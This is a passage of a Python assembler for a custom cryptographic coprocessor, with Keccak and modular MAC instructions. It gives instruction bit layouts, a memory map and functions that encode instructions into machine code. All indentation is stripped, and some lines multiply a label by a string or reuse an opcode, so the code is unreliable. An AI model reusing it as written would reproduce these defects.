# Jump - Jump if less to the specified position, memo -> PC if mema > memb
# Local bus memory
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# unsigned values
# jumpl OOOO YYYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000010 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
# signed values
# jumpls OOOO YYYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000010 | 0 memo | 1 0 Cx memb | 1 0 Cx mema |
#
# Jump - Jump if equal or less to the specified position, memo -> PC if mema > memb
# Local bus memory
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# unsigned values
# jumpeql OOOO YYYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000011 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
# signed values
# jumpeqls OOOO YYYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000011 | 0 memo | 1 0 Cx memb | 1 0 Cx mema |
#
# Push Memory map position a in mac ram -> Stack
# Full bus memory
# OOOO = #constant
# OOOO = bXXXX
# OOOO = rdXX
# OOOO = rpc
# OOOO = rstatus
# OOOO = roperands
# OOOO = rprimeline
# push OOOO
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000100 | 0 0 | 0 0 0 0 | 0 Dir Cx mema |
#
# Pop Stack -> Memory map position o in mac ram
# Full bus memory
# OOOO = bXXXX
# OOOO = rdXX
# OOOO = rpc
# OOOO = rstatus
# OOOO = roperands
# OOOO = rprimeline
# pop OOOO
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000101 | Dir memo | 0 0 0 0 | 0 0 0 0 |
#
# Push Memory map position a in mac ram -> Stack
# Full bus memory
# pushf mXXX.X
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000110 | 0 0 | 0 0 0 0 | 0 Dir 1 mema |
#
# Pop Stack -> Memory map position o in mac ram
# Full bus memory
# popf mXXX.X
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 000111 | Dir memo | 0 0 0 0 | 0 0 0 0 |
#
# Push Memory map position a in mac ram -> Stack
# Full bus memory
# pushm mXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001000 | 0 0 | 0 0 0 0 | 0 Dir 1 mema |
#
# Pop Stack -> Memory map position o in mac ram
# Full bus memory
# popm mXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001001 | Dir memo | 0 0 0 0 | 0 0 0 0 |
#
# Copy value mema -> memb
# Local bus memory
# copy memo mema
# OOOO = bXXXX
# OOOO = mXXX.X.XX
# OOOO = rdXX
# YYYY = #constant
# YYYY = bXXXX
# YYYY = mXXX.X.XX
# YYYY = rdXX
# YYYY = rpc
# YYYY = rstatus
# YYYY = roperands
# YYYY = rprimeline
# copy OOOO YYYY
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001010 | Dir memo | 0 0 0 0 | 0 Dir Cx mema |
#
# Copy value mema -> memb
# Full bus memory
# copyf memo mema
# OOOO = mXXX.X
# YYYY = mXXX.X
# copyf OOOO YYYY
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001011 | Dir memo | 0 0 0 0 | 0 Dir 1 mema |
#
# Copy value mema -> memb
# Full bus memory
# copym memo mema
# OOOO = mXXX.0
# YYYY = mXXX.0
# copym OOOO YYYY
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001100 | Dir memo | 0 0 0 0 | 0 Dir 1 mema |
#
# Load value mac memory
# Full bus memory
# lconstf mXXX.X #constant
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001101 | Dir memo | 0 0 0 0 | Sign 0 0 value |
#
# Load value mac memory
# Full bus memory
# lconstm mXXX.0 #constant
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001110 | Dir memo | 0 0 0 0 | Sign 0 0 value |
#
# Call function
# stack <- pc+1
# pc <- #constant
# OOOO = #constant
# OOOO = rdOO
# call OOOO
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 001111 | 0 memo | 0 0 0 0 | 0 0 1 pc |
#
# Return function
# pc <- stack
# ret
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 010000 | 0 0 | 0 0 0 0 | 0 0 1 stack |
#
# Keccak Init - Initialize keccak core
# keccak_init
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 010010 | 0 0 | 0 0 0 0 | 0 0 0 0 |
#
# Keccak Go - Perform 24 rounds of Keccak
# keccak_go
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 010011 | 0 0 | 0 0 0 0 | 0 0 0 0 |
#
# Copy array mema -> memb
# Local bus memory
# copya inc|dec (r|d|s|ds) memo mema
# OOOO = bXXXX
# OOOO = mXXX.X.XX
# OOOO = rdXX
# YYYY = #constant
# YYYY = bXXXX
# YYYY = mXXX.X.XX
# YYYY = rdXX
# YYYY = rpc
# YYYY = rstatus
# YYYY = roperands
# YYYY = rprimeline
# copya inc|dec (r|d|s|ds) OOOO YYYY #size
# inc = 0, dec = 1
# Cd = Destiny constant (0 = constant)
# Cs = Source constant (0 = constant)
# | 63 62 | 61 | 60 ... 58 | 57 | 56 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 011 | inc/dec | Cd Cs | Dir memo | 0 0 0 size | 0 Dir Cx mema |
#
# Addition value memo = memb + mema
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# badd OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100000 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Subtraction value memo = memb - mema
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# bsub OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100001 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Multiplication value single memo = memb * mema
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# bsmul OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100010 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# bsmuls OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100010 | 0 memo | 1 0 Cx memb | 1 0 Cx mema |
#
# Shift right 17 bits value (memo) = (memb) >> consta
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# bshiftr OOOO YYYY #constant
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100100 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Rotate right 17 bits value (memo) = (memb) >> consta
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# brotr OOOO YYYY #constant
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100101 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Shift left 17 bits value (memo) = (memb) << consta
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# bshiftl OOOO YYYY #constant
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100110 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Rotate left 17 bits value (memo) = (memb) << consta
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# brotl OOOO YYYY #constant
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 100111 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Logic and 17 bits value memo = memb AND mema
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# bland OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 101000 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Logic or 17 bits value memo = memb OR mema
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# blor OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 101001 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Logic xor 17 bits value memo = memb XOR mema
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# blxor OOOO YYYY XXXX
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 101010 | 0 memo | 0 0 Cx memb | 0 0 Cx mema |
#
# Logic NOT 17 bits value memo = NOT mema
# Register direct
# OOOO = #constant
# OOOO = rdOO
# YYYY = #constant
# YYYY = rdYY
# XXXX = #constant
# XXXX = rdXX
# blnot OOOO YYYY
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 101010 | 0 memo | 0 0 Cx memb | 0 0 0 1...1 |
#
# fin
# Finish execution
# | 63 62 | 61 | 60 ... 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 00 | 0 | 111111 | 0 0 | 0 0 0 0 | 0 0 0 0 |
#
#
# MAC Instructions (01)
#
# OOOO = MOOO
# OOOO = ROO
# OOOO = IOO
# AAAA = MAAA
# AAAA = RAA
# AAAA = IAA
# BBBB = MBBB
# BBBB = RBB
# BBBB = IBB
# mmuld OOOO BBBB AAAA
# Multiplication Comba no reduction instruction
# If all memory positions are 0, then the slot is disabled
# | 63 62 | 61 59 | 58 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 01 | 000 | 0000 | Dir Mo | 0 Dir En Mb | 0 Dir En Ma |
#
# OOOO = MOOO
# OOOO = ROO
# OOOO = IOO
# AAAA = MAAA
# AAAA = RAA
# AAAA = IAA
# msqud OOOO AAAA
# Square Comba no reduction instruction
# If all memory positions are 0, then the slot is disabled
# | 63 62 | 61 59 | 58 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 01 | 000 | 0001 | Dir Mo | 0 Dir En Ma | 0 Dir En Ma |
#
# OOOO = MOOO
# OOOO = ROO
# OOOO = IOO
# AAAA = MAAA
# AAAA = RAA
# AAAA = IAA
# BBBB = MBBB
# BBBB = RBB
# BBBB = IBB
# mmulm OOOO BBBB AAAA
# mmulm OOOO BBBB AAAA
# Multiplication FIPS instruction
# If all memory positions are 0, then the slot is disabled
# | 63 62 | 61 59 | 58 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 01 | 000 | 0010 | Dir Mo | 0 Dir En Mb | 0 Dir En Ma |
#
# OOOO = MOOO
# OOOO = ROO
# OOOO = IOO
# AAAA = MAAA
# AAAA = RAA
# AAAA = IAA
# msqum OOOO AAAA
# msqum OOOO AAAA
# Square FIPS instruction
# If all memory positions are 0, then the slot is disabled
# | 63 62 | 61 59 | 58 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 01 | 000 | 0011 | Dir Mo | 0 Dir En Ma | 0 Dir En Ma |
#
# OOOO = MOOO
# OOOO = ROO
# OOOO = IOO
# AAAA = MAAA
# AAAA = RAA
# AAAA = IAA
# BBBB = MBBB
# BBBB = RBB
# BBBB = IBB
# madd_subd OOOO BBBB + AAAA
# madd_subd OOOO BBBB - AAAA
# Addition/Subtraction instruction - no reduction
# If all memory positions are 0, then the slot is disabled
# | 63 62 | 61 59 | 58 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 01 | 000 | 0100 | Dir Mo | 0 Dir En Mb | Sign Dir En Ma |
#
# OOOO = MOOO
# OOOO = ROO
# OOOO = IOO
# AAAA = MAAA
# AAAA = RAA
# AAAA = IAA
# BBBB = MBBB
# BBBB = RBB
# BBBB = IBB
# mitred OOOO AAAA
# Iterative modular reduction
# If all memory positions are 0, then the slot is disabled
# | 63 62 | 61 59 | 58 55 | 54 53 ... 38 | 37 36 35 34 ... 19 | 18 17 16 15 ... 0 |
# | 01 | 000 | 0101 | Dir Mo | 0 0 0 0 | Sign Dir En Ma |
#
# Memory model
#
# R - Internal Read
# W - Internal Write
# E - External Read
# S - External Write
# ____________________________________
# |00000| MAC RAM |
# |07FFF|______________________________|
# ____________________________________
# |08000| Reserved |
# |0BFFF|______________________________|
# ____________________________________
# |0C000| ALU RAM |
# |0C3FF|______________________________|
# ____________________________________
# |0C400| Reserved |
# |0CFFF|______________________________|
# ____________________________________
# | | Keccak |
# |0D000| absorb |
# |0D07F| absorb |
# |0D080| squeeze |
# |0D0FF| squeeze |
# |0D100| dout |
# |0D1FF|______________________________|
# ____________________________________
# |0D200| Reserved |
# |0DFFF|______________________________|
# ____________________________________
# | | Status Regs |
# |0E000| PC Init |
# |0E001| Status |
# |0E002| Operands size |
# |0E003| Prime line = 1? |
# |0E004| Prime address |
# |0E005| Prime+1 address |
# |0E006| Prime' address |
# |0E007| Initial stack address |
# |0E008| Flag address |
# |0E009| Scalar init address |
# | | |
# |0EFFF| Reserved |
# |____________________________________|
# ____________________________________
# |0F000| Reserved |
# |0FFFF|______________________________|
#
#
# Special area. Only external communication
# ____________________________________
# |10000| Program |
# |17FFF|______________________________|
# ____________________________________
# |18000| Reserved |
# |1FFFF|______________________________|
#
import sys
import os
import tempfile
def instruction_nop(command, internal_labels, final_pass=True):
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0000000'
machine_code_operand_o = '00000000000000000'
machine_code_operand_b = '0000000000000000000'
machine_code_operand_a = '0000000000000000000'
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_jumpeq(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0000001'
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0] == '#'):
if(command[1][1] == '('):
multiplicative_factor, constant = command[1][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[1][1:]
if(constant in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[0] == 'jump'):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format(int(0))
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format(int(0))
else:
if(command[2] in internal_labels):
machine_code_operand_b = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rd'):
machine_code_operand_b = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rm'):
machine_code_operand_b = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rl'):
machine_code_operand_b = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(internal_labels[command[2]])
elif(command[2][0] == '#'):
if(command[2][1] == '('):
multiplicative_factor, constant = command[2][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[2][1:]
if(constant in internal_labels):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_b = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[3] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(internal_labels[command[3]])
elif(command[3][0] == '#'):
if(command[3][1] == '('):
multiplicative_factor, constant = command[3][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[3][1:]
if(constant in internal_labels):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_jumpl(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0000010'
if(command[0] == 'jumpl'):
machine_code_operand_b_signed = "0"
machine_code_operand_a_signed = "0"
elif(command[0] == 'jumpls'):
machine_code_operand_b_signed = "1"
machine_code_operand_a_signed = "1"
else:
error_during_assembly = True
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0] == '#'):
if(command[1][1] == '('):
multiplicative_factor, constant = command[1][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[1][1:]
if(constant in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[2] in internal_labels):
machine_code_operand_b = machine_code_operand_b_signed + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rd'):
machine_code_operand_b = machine_code_operand_b_signed + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rm'):
machine_code_operand_b = machine_code_operand_b_signed + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rl'):
machine_code_operand_b = machine_code_operand_b_signed + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(internal_labels[command[2]])
elif(command[2][0] == '#'):
if(command[2][1] == '('):
multiplicative_factor, constant = command[2][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[2][1:]
if(constant in internal_labels):
machine_code_operand_b = machine_code_operand_b_signed + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*constant)
elif(constant.isdigit()):
machine_code_operand_b = machine_code_operand_b_signed + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[3] in internal_labels):
machine_code_operand_a = machine_code_operand_a_signed + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rd'):
machine_code_operand_a = machine_code_operand_a_signed + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rm'):
machine_code_operand_a = machine_code_operand_a_signed + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rl'):
machine_code_operand_a = machine_code_operand_a_signed + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(internal_labels[command[3]])
elif(command[3][0] == '#'):
if(command[3][1] == '('):
multiplicative_factor, constant = command[3][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[3][1:]
if(constant in internal_labels):
machine_code_operand_a = machine_code_operand_a_signed + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = machine_code_operand_a_signed + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_jumpeql(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0000011'
if(command[0] == 'jumpeql'):
machine_code_operand_b_signed = "0"
machine_code_operand_a_signed = "0"
elif(command[0] == 'jumpeqls'):
machine_code_operand_b_signed = "1"
machine_code_operand_a_signed = "1"
else:
error_during_assembly = True
if(command[1] in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0] == '#'):
if(command[1][1] == '('):
multiplicative_factor, constant = command[1][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[1][1:]
if(constant in internal_labels):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_o = "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[2] in internal_labels):
machine_code_operand_b = machine_code_operand_b_signed + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rd'):
machine_code_operand_b = machine_code_operand_b_signed + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rm'):
machine_code_operand_b = machine_code_operand_b_signed + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(internal_labels[command[2]])
elif(command[2][0:3] == '*rl'):
machine_code_operand_b = machine_code_operand_b_signed + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(internal_labels[command[2]])
elif(command[2][0] == '#'):
if(command[2][1] == '('):
multiplicative_factor, constant = command[2][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[2][1:]
if(constant in internal_labels):
machine_code_operand_b = machine_code_operand_b_signed + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*constant)
elif(constant.isdigit()):
machine_code_operand_b = machine_code_operand_b_signed + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(command[3] in internal_labels):
machine_code_operand_a = machine_code_operand_a_signed + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rd'):
machine_code_operand_a = machine_code_operand_a_signed + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rm'):
machine_code_operand_a = machine_code_operand_a_signed + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(internal_labels[command[3]])
elif(command[3][0:3] == '*rl'):
machine_code_operand_a = machine_code_operand_a_signed + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(internal_labels[command[3]])
elif(command[3][0] == '#'):
if(command[3][1] == '('):
multiplicative_factor, constant = command[3][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[3][1:]
if(constant in internal_labels):
machine_code_operand_a = machine_code_operand_a_signed + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = machine_code_operand_a_signed + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_push(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0000100'
machine_code_operand_o = '00000000000000000'
machine_code_operand_b = '0000000000000000000'
if(command[1] in internal_labels):
machine_code_operand_a = "0" + "0" + "1" + ("{0:0"+str(16)+"b}").format(internal_labels[command[1]])
elif(command[1][0:3] == '*rd'):
machine_code_operand_a = "0" + "1" + "1" + '00' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rm'):
machine_code_operand_a = "0" + "1" + "1" + '10' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0:3] == '*rl'):
machine_code_operand_a = "0" + "1" + "1" + '11' + ("{0:0"+str(14)+"b}").format(int(command[1][3:]))
elif(command[1][0] == '#'):
if(command[1][1] == '('):
multiplicative_factor, constant = command[1][2:].split(')', 1)
multiplicative_factor = int(multiplicative_factor)
else:
multiplicative_factor = 1
constant = command[1][1:]
if(constant in internal_labels):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((internal_labels[constant])*multiplicative_factor)
elif(constant.isdigit()):
machine_code_operand_a = "0" + "0" + "0" + ("{0:0"+str(16)+"b}").format((int(constant))*multiplicative_factor)
else:
error_during_assembly = True
else:
error_during_assembly = True
if(error_during_assembly):
if(not final_pass):
return "", number_of_instructions
else:
print("Invalid instruction")
print(command)
return -1
machine_code = machine_code_processor + machine_code_intruction_type + machine_code_operand_o + machine_code_operand_b + machine_code_operand_a
#machine_code = ("{0:0"+str(64-64)+"b}").format(0) + machine_code
return machine_code, number_of_instructions
def instruction_pop(command, internal_labels, final_pass=True):
error_during_assembly = False
number_of_instructions = 1
machine_code_processor = '00'
machine_code_intruction_type = '0000101'
machine_code_operand_a = '0000000000000000000'
